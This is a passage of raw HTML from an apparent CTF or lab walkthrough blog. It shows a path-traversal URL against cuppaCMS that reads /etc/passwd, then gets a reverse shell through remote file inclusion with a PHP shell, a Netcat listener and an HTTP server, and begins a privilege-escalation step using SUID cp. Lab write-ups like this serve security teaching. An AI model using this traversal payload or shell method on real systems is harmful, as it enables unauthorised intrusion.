style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The exploit allows&amp;nbsp;to read&lt;b&gt; /etc/passwd:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;http://192.168.1.26/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3vwj-Ax11D97gouwoRQM83x0yCGo60uCzywRiEIRyPObVpIxfnmWzEOquIPu-WBNTwFC-YcsrVwXohHjKK66Lq8atn-nzqnTL3DLHdZMCIGke1RsE6vdo4FhG2_xIMyFT3Is2H__Xgdls/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;384&quot; data-original-width=&quot;1065&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3vwj-Ax11D97gouwoRQM83x0yCGo60uCzywRiEIRyPObVpIxfnmWzEOquIPu-WBNTwFC-YcsrVwXohHjKK66Lq8atn-nzqnTL3DLHdZMCIGke1RsE6vdo4FhG2_xIMyFT3Is2H__Xgdls/s16000/screenshot.41.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span&gt;- Copying locally &lt;/span&gt;&lt;b&gt;php-reverse-shell.php&lt;/b&gt;&lt;span&gt;, renaming &lt;/span&gt;&lt;b&gt;myshell.php&lt;/b&gt;&lt;span&gt; and adapting it to our needs:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcpFAo4L_e1yQReHsSRWW4fvxbhxsVLWRYQ4YmfZfBjNxWsRv3HhIkWT0MBzE-ZJ3Sa43u8yk6MEb5eyhcvJvAFPghzQL-N7Hu29yTe7HkWWGQD27c8dVerg5DfumtKUzsWkLY-Di0bJq6/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;49&quot; data-original-width=&quot;806&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcpFAo4L_e1yQReHsSRWW4fvxbhxsVLWRYQ4YmfZfBjNxWsRv3HhIkWT0MBzE-ZJ3Sa43u8yk6MEb5eyhcvJvAFPghzQL-N7Hu29yTe7HkWWGQD27c8dVerg5DfumtKUzsWkLY-Di0bJq6/s16000/screenshot.34.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKGXH7m03ZN_6ntkI78PGPTCcvofwcGbsYJkSuIvSpuv_POkgmj7b2Sfou0kEnqbQVAqZmBqXn_olua0D5aic0GaHawRPxCKdfEk9AVbtrI0h5hiNK8DmsOX8lmy87ausrhyphenhyphen4IDK5484ES/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;28&quot; data-original-width=&quot;433&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKGXH7m03ZN_6ntkI78PGPTCcvofwcGbsYJkSuIvSpuv_POkgmj7b2Sfou0kEnqbQVAqZmBqXn_olua0D5aic0GaHawRPxCKdfEk9AVbtrI0h5hiNK8DmsOX8lmy87ausrhyphenhyphen4IDK5484ES/s16000/screenshot.35.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6BRpb8Ja4cfGspzGUGSpBMTestF-l4n4hmMnAMaUbeJxBaH9on1GKHT0JhyyvO2KeOdF3h34e-L38TtjuzsIB3ZFAIlEKVDIHFQMC6BMh1sYeK9vgKxOUfZmowMRkhz35396B1rOm0SRe/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;411&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6BRpb8Ja4cfGspzGUGSpBMTestF-l4n4hmMnAMaUbeJxBaH9on1GKHT0JhyyvO2KeOdF3h34e-L38TtjuzsIB3ZFAIlEKVDIHFQMC6BMh1sYeK9vgKxOUfZmowMRkhz35396B1rOm0SRe/s16000/screenshot.36.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Setting a Netcat listener at port 1234:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtS6F4Z5NY9PpvLRP6Y2wL50yxOLLCpLvWBE5KBA2HiKYyzRIzDNwKuZMKr_jLUBC-stdIaQqxNVPaYtHMukJqZmnmQ6vifCDSVHCYsEiVhk9MhPvLcXLF5YthhFjGkgWqHenmrTR89HVR/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;47&quot; data-original-width=&quot;395&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtS6F4Z5NY9PpvLRP6Y2wL50yxOLLCpLvWBE5KBA2HiKYyzRIzDNwKuZMKr_jLUBC-stdIaQqxNVPaYtHMukJqZmnmQ6vifCDSVHCYsEiVhk9MhPvLcXLF5YthhFjGkgWqHenmrTR89HVR/s16000/screenshot.37.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Setting a SimpleHTTPServer at port 8000:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEjcnaLT2XZGobJLlVVi9mUqdCI1fF40wIipFTW0_ge2AVSZSIjuSZSnTj1BQShUNEAgYcMm7AXnKr22K5UnA_tX2wnvNU-Ejutvls_svu00hNDThL6qEu5HyAm3LkGg8W5WkiPnrLs6t6/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;54&quot; data-original-width=&quot;542&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEjcnaLT2XZGobJLlVVi9mUqdCI1fF40wIipFTW0_ge2AVSZSIjuSZSnTj1BQShUNEAgYcMm7AXnKr22K5UnA_tX2wnvNU-Ejutvls_svu00hNDThL6qEu5HyAm3LkGg8W5WkiPnrLs6t6/s16000/screenshot.39.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;- Applying again the RFI, just by including this line at the browser:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0PD6YFspDbJg1NWplBbBISeN0VxZmY83SBCGiN6BDDhFJgpDo6VkGfEQnyXZKxCg6CcbfQi42idjOinVCKwVRi2v1b6j2gfHjtKQwzQrWSodr4duW8vTFCV1tCgjbmLy_oh23FmxygaQs/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;36&quot; data-original-width=&quot;1061&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0PD6YFspDbJg1NWplBbBISeN0VxZmY83SBCGiN6BDDhFJgpDo6VkGfEQnyXZKxCg6CcbfQi42idjOinVCKwVRi2v1b6j2gfHjtKQwzQrWSodr4duW8vTFCV1tCgjbmLy_oh23FmxygaQs/s16000/screenshot.43.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWgjdJ_S1bu8sEO1_MLFFeAN94LsjvBxNfwC6dbd3qnYhmmsGpmlvg6gHEJ6Wp9DSt_o46mzlK3BhNPPlGbQ9nKr_MkT1kP52RiWFs-BSsgOMAb0MIBk9ImIF4EX0-2XP7gbYM0aWezyfd/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;142&quot; data-original-width=&quot;1076&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWgjdJ_S1bu8sEO1_MLFFeAN94LsjvBxNfwC6dbd3qnYhmmsGpmlvg6gHEJ6Wp9DSt_o46mzlK3BhNPPlGbQ9nKr_MkT1kP52RiWFs-BSsgOMAb0MIBk9ImIF4EX0-2XP7gbYM0aWezyfd/s16000/screenshot.42.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;- A remote shell is achieved:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNKf30EZpDH6X1V7FoDypRhp0Qnoyqjj8jwtfb6DdyshBFSQMgkGLObxsj9Wjkj6ekBRf5LVcFJ__k_xdRnD_l4q913JvNBAYiaVY_o4HyYNyYs8mzw4CrM5XPt2C0yyx8WWfEnuySnU_0/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;214&quot; data-original-width=&quot;485&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNKf30EZpDH6X1V7FoDypRhp0Qnoyqjj8jwtfb6DdyshBFSQMgkGLObxsj9Wjkj6ekBRf5LVcFJ__k_xdRnD_l4q913JvNBAYiaVY_o4HyYNyYs8mzw4CrM5XPt2C0yyx8WWfEnuySnU_0/s16000/screenshot.45.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSOT62nttfwus15CeJ-i7BY9gd-WHLDZVE48y00lUq__OoGww1G8xYjxGleBd9vr7riKqyyCE3TjfHLn8sbA1vnM_SaljI1o8NwXMLW-KBbFiDPr5v4Z1j-AGL09cR15NHqcNZ8R0eJMrr/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;71&quot; data-original-width=&quot;502&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSOT62nttfwus15CeJ-i7BY9gd-WHLDZVE48y00lUq__OoGww1G8xYjxGleBd9vr7riKqyyCE3TjfHLn8sbA1vnM_SaljI1o8NwXMLW-KBbFiDPr5v4Z1j-AGL09cR15NHqcNZ8R0eJMrr/s16000/screenshot.46.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for SUID binaries we find &lt;b&gt;/usr/bin/cp&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlt0AldLW04EQrA7DPhoZw4LTZLMLh5JNTmAOzYiyBLgnNbmCXL8WPIxCMbR0aap7XIqHTXeU657gNjyDytbKKH7eict8fw6Y8bMtC7B5Az0gWadB5tYxTChyTImu0s1wp0u-teJUY1NoQ/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;231&quot; data-original-width=&quot;503&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlt0AldLW04EQrA7DPhoZw4LTZLMLh5JNTmAOzYiyBLgnNbmCXL8WPIxCMbR0aap7XIqHTXeU657gNjyDytbKKH7eict8fw6Y8bMtC7B5Az0gWadB5tYxTChyTImu0s1wp0u-teJUY1NoQ/s16000/screenshot.47.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Also, we detect that &lt;b&gt;maintenance.sh &lt;/b&gt;is a &lt;b&gt;cron&lt;/b&gt; job owned by 